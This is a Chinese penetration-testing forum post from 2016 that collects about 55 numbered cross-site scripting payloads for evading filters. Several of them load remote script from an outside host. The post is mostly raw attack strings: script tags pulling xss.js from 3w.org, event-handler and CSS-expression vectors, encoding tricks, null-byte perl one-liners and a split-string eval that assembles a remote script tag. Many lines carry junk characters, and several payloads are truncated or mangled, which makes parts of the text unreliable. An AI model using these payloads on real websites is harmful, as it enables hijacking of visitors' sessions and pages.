中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]
作者: admin    时间: 2016-4-28 10:06
标题: XSS攻击汇总
(1)普通的XSS JavaScript注入4 T" W7 z- _6 b- t
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 i- F* A8 F9 l; [8 X# B, a: p
(99)另类弹框# _1 ]: n0 T) [) F9 _; L/ d) d/ v. T3 ^
<q/oncut=alert()>15 l) l+ ?& o4 J5 |" ]! l
<s/onclick=alert()>b
4 g: X) }$ W% A  q  O. J <XSS=" onclick="alert(1)//">clickme</SSX=">% l: j% w$ a# d1 |
<zzz onclick=alert`1`>clickme</zzz>
. k; a  F9 `! f0 | <a onclick=alert`1`>clickme</a>
0 S; G9 W0 `1 [4 q) a. m2 [& V<a=">clickme</a=">
( {. i7 E+ `9 s4 K7 E; ^. O/ z1 w<a=">clickme</a>3 k3 z0 U7 \3 {. |- l" z2 Z! k
<z=">clickme</z=">
4 X7 [; M5 d! B; t) s<z onclick=alert`1`>clickme</z>% f. P* W' X6 j
0 u% w* `1 Y1 m2 z( o6 O+ X( I
(2)IMG标签XSS使用JavaScript命令
( e7 r/ R+ F: ]- c7 {2 ^- x5 F<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>2 |' b( `: ]" H/ ]8 m2 q" {
* d( K) C% J2 K+ A
(3)IMG标签无分号无引号
& x/ _' O+ Y. K) i. A( J<IMG SRC=javascript:alert(‘XSS’)>
" S" I( A" g% Q
7 J: f& x7 k* R) x(4)IMG标签大小写不敏感
. F: W5 S: I9 @5 x# M9 ~& I, m<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) H0 @  s7 s0 I" n( e0 z% F
! k1 l$ Y' @5 |9 |1 @9 q2 c% p
(5)HTML编码(必须有分号), l$ h8 P: I* e. f6 z
<IMG SRC=javascript:alert(“XSS”)>0 {/ E) O, T8 x+ K- E6 c( I+ G/ O  G
0 T- Y( f( B  B# V/ @( U
(6)修正缺陷IMG标签
6 N3 x' ^3 u; j<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 f+ l2 d6 d# S' x+ y8 b+ Z. ~/ p
, O/ e5 M/ J+ v( G9 h
(7)formCharCode标签(计算器)
1 t$ m9 u" r; L. r, s/ g<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>: G0 P+ X1 m; V7 N; T
* C+ N8 j. L( K* X6 u6 N' L
(8)UTF-8的Unicode编码(计算器)
8 q. `- E2 ^  v& Z6 ?<IMG SRC=jav..省略..S')>
( q+ d5 u2 `" ~5 @8 G0 B# G' x" B+ B9 i  Z9 p
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
" ]9 {7 [) y' G# z9 y2 {<IMG SRC=jav..省略..S')>) ]' ~, l3 O8 Q9 I7 }

5 w( r7 c- H" q5 d7 R(10)十六进制编码也是没有分号(计算器)
9 R) y5 x( y/ a, L4 R( Y<IMG SRC=\'#\'" /span>
& R$ V' y- t2 r5 i/ I+ a" l" {; E$ e* O; A+ c' b8 D  P5 d% L
(11)嵌入式标签,将Javascript分开9 J$ }1 X# p( m+ o
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>$ T6 r7 E/ R( Q0 X2 f
' o, b7 e5 n3 O: J9 G& f0 q
(12)嵌入式编码标签,将Javascript分开
& H  ?$ Y& ~+ M3 D. d<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
! R0 A, {! |. F5 f/ |% Q1 ]; t2 V" F4 M! ^6 f0 {) t
(13)嵌入式换行符8 B3 u) G6 c! n0 _* F' M
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>9 c& q* |: p$ ]; v

5 {, D* ~& P( _9 M  a0 o" L) S/ _(14)嵌入式回车- b6 `3 @8 Z, Q+ m% D: R
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 j( D/ E' g( u, k* \7 g) c, ^1 _# {( U+ X$ o
(15)嵌入式多行注入JavaScript,这是XSS极端的例子# n( k4 |* K$ q* j' M
<IMG SRC=\'#\'" /span>
- Y$ Q/ o" ?6 r8 K8 _, t2 m
+ f. j0 ^, H* P0 ^' x(16)解决限制字符(要求同页面)3 Y7 _& X* F- `$ A, L
<script>z=’document.’</script>% c% J$ O; O) ^) Y/ u! j  V
<script>z=z+’write(“‘</script>" {- n& V9 a; m. X0 Z3 L* |  S' Y
<script>z=z+’<script’</script>& d* Z- y+ s/ A7 h$ u4 u7 O# ?
<script>z=z+’ src=ht’</script>4 D- W0 J  \. ~/ G
<script>z=z+’tp://ww’</script>
" _* k8 Y1 B! n( }) l, n6 _3 H<script>z=z+’w.shell’</script>. A3 P, Z+ B$ d9 o1 d0 e
<script>z=z+’.net/1.’</script>
( r# i, G& [+ N<script>z=z+’js></sc’</script>
9 b" p' b6 ?9 N, B9 y<script>z=z+’ript>”)’</script>8 W# {. V# }: ]& t
<script>eval_r(z)</script>
% A( w" w& i' R: f# K1 c! a- W8 x/ m2 Z# P; z
(17)空字符* @2 Z. ?0 P) Y5 G# X
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ A5 ^9 z# C) N2 R& ~# J( ]: C0 S/ j1 ^+ H2 E
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用/ p  a: F0 B0 L
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out" c' }# ^; d, s* _; e
/ x4 t+ [: u2 {& ~! J
(19)Spaces和meta前的IMG标签% h3 F" W) n/ {2 _. L
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>. O. ?# J3 ]% P5 z

! h. B( h' y4 B& ^$ R(20)Non-alpha-non-digit XSS
! s9 ?& s0 F3 `3 J4 g2 C! E4 [<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>% h5 z4 L2 ]* r5 P

9 o3 T6 Q- J$ q$ L' E* }6 w(21)Non-alpha-non-digit XSS to 2
7 V+ g9 G! R, [$ D2 }<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
$ T+ @. L0 `; R( I
. T5 |  Y% {$ L8 ~7 A# G0 j(22)Non-alpha-non-digit XSS to 3& u0 |: h3 A$ f8 {5 X' [( z
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
6 O, ~2 F( Y& _9 E+ j. Q8 j1 q" j7 v
(23)双开括号* `: P. m6 h. i
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
, r# T0 D0 g- s) c$ n% W* v$ |+ f0 Q8 P8 c9 p
(24)无结束脚本标记(仅火狐等浏览器)$ T" g# q1 A% f( f
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 A: ?5 z) G, b$ u
% K7 p/ f" s- C8 V+ j
(25)无结束脚本标记20 Q7 T& L3 b) I7 Q, f8 n! Y
<SCRIPT SRC=//3w.org/XSS/xss.js>' c: `* G( f0 |3 v2 w
4 x( @" U3 x/ v! G5 D
(26)半开的HTML/JavaScript XSS
( ~/ h: m" ?# F* X; l2 n8 w<IMG SRC=\'#\'" /span>
. P& j3 C9 F' H& |0 {. l# S
, n& k/ C$ `$ `* \(27)双开角括号
) o+ }' d" u+ G+ A! ?8 D) F<iframe src=http://3w.org/XSS.html <! o- {$ ~( K1 |, d* P' }
- e% U1 ]9 I1 T. c% ]
(28)无单引号 双引号 分号. u. R3 r- |, H/ A
<SCRIPT>a=/XSS/2 q3 V- h4 o9 f: L/ V- i& u6 ~
alert(a.source)</SCRIPT>
! k5 D: {2 a! h0 N8 Y  C' f7 f+ C; @7 \2 x: Z7 G* r. \5 m: ?" C/ R" l
(29)换码过滤的JavaScript7 ^7 j  A8 U, Z! o# J0 S% c* J4 @1 b2 s
\”;alert(‘XSS’);//  r- A+ {/ @% N# D  t7 K" {
9 q. Y& m) _& s
(30)结束Title标签
& o  b, S" I1 ]</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 c% A" V) Z4 d' Y
1 N2 @5 R2 a8 Y  A* C/ H- ?% [
(31)Input Image
( E/ n) I% A, [3 E, W<INPUT SRC=\'#\'" /span>
: C6 `3 V. V# v$ r$ @, I
% H7 j- T' o7 t(32)BODY Image3 l" s9 S; Z! K/ _' |' @! i) {
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>% @; V% B- k5 |4 Z2 K$ B0 ]  |+ T
5 L4 [! l7 I, c- o
(33)BODY标签0 R/ I. `  Y+ a* G" ], Y$ I/ N/ j
<BODY(‘XSS’)>% ]; q+ u; h' N& g) R$ b9 k9 N  i
, }$ F" |6 R7 G' @# J. ?1 g& M/ r; P6 U
(34)IMG Dynsrc$ a" u* j, k; a- N
<IMG DYNSRC=\'#\'" /span>* w  L% e. W( {8 _  N
( h# g. W9 o  `1 W
(35)IMG Lowsrc
. Q1 g4 m& e7 ?6 w! ~& @0 ]4 _<IMG LOWSRC=\'#\'" /span>5 O! W$ H8 R% V: n- G/ g. b1 _
8 ]9 G5 o# U, v- V# Z( ]
(36)BGSOUND
* e8 y" l- a7 u( M) [# n  N( r<BGSOUND SRC=\'#\'" /span>
; ~1 [# ^9 f1 n: d( ~' D' ~/ h
# I+ ]$ |0 f' p9 E(37)STYLE sheet8 s0 W  t$ Y0 Z5 j
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>/ N2 q2 P8 ^' Q+ r) G0 v

5 E! w; g* w. _6 b(38)远程样式表& H9 N! Q: T( \6 U3 v$ y% ~' i/ A& _
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
: v7 J. S$ R# Z& C& ?. e2 t: M8 |# ?- @1 v" K9 {1 H6 A: Z( |* u
(39)List-style-image(列表式)
! V5 R: K; k; {- z; _( M<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 s: h& Z) m0 L; D4 P) X
3 k4 r; h5 E; b(40)IMG VBscript6 @+ p/ G5 _) {# l0 N5 F9 T
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS  B* U9 I! R6 S0 s  V1 b. s! ]: ?

+ t8 |* `8 v0 }# j- a) ~(41)META链接url5 x# H7 \; G( ?
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>- n$ ~# A2 y! b. x  ?: V

2 L; d0 ~4 t$ W# g! V3 B(42)Iframe/ [% X( k" @# J/ l. o- F
<IFRAME SRC=\'#\'" /IFRAME>
3 B. u* X( k, ~1 Y$ q
% I8 U' _. T; m- ^(43)Frame* {& b& P2 p$ \
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
- u! y% n/ W& d6 q9 q4 _$ F7 P: B0 \* W
(44)Table
; T+ p9 Q4 D' X$ U1 b9 Q<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
( ]# U$ {' f( Y
  e7 k$ y4 U& Q0 p% u' L1 \3 C& f(45)TD2 U7 P* Q, V6 x4 Y$ v
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
/ b$ H: p" \( p2 t7 r3 H" l: V/ g' ^4 b, x7 n
(46)DIV background-image
+ v4 g  L. p7 U, y- g, R<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' V) P9 g; |7 ]5 S6 l0 f8 f) ~" K* q# _4 [# V' w
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
" y) S- g7 Z1 `- L7 N* Q<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* I5 o* Q: y0 ^" U6 C6 k- s/ F

- @4 v2 G! x5 B/ o(48)DIV expression3 p  t, T' g/ U9 z2 _# g  h0 c
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 W$ |( G6 K" B  W$ t
$ l& Z$ k. g1 F(49)STYLE属性分拆表达1 z0 s) U: Q) r! ^
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
1 _. c& b* K  l& n4 A' A2 U/ {8 z$ s/ P' x
(50)匿名STYLE(组成:开角号和一个字母开头)% M2 i8 x: D$ E
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
6 v# c& \' S' P# ~6 G) y  e
7 _1 U  e# d0 W/ J(51)STYLE background-image
+ a- H! W, v. ?% {+ P4 [. F" Z<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
% E9 J" b& @- R1 n6 Y4 k, }7 G7 D- B6 ?! k: W- I
(52)IMG STYLE方式
! Y) k* [( F" Y  i" i$ Jexppression(alert(“XSS”))’>% g8 Y; _% y3 \  U, v  l+ ?
/ t! Q% y' w: f6 o5 V
(53)STYLE background
3 ]% ], J4 Y4 D' ?<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
9 I) g( x$ a/ U) p; \" L! X9 s/ v7 l2 d8 t$ _' x) s! d) p" D
(54)BASE; F7 x# E8 t% Z& N. g, L( ?
<BASE HREF=”javascript:alert(‘XSS’);//”>0 c& L8 b; e/ Z0 M8 ]" F
9 _" j& E- o  b# J
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS" z' G8 N6 \- `3 F" f' n
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>' j0 W/ M' E' i  S9 O2 t: H( J




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2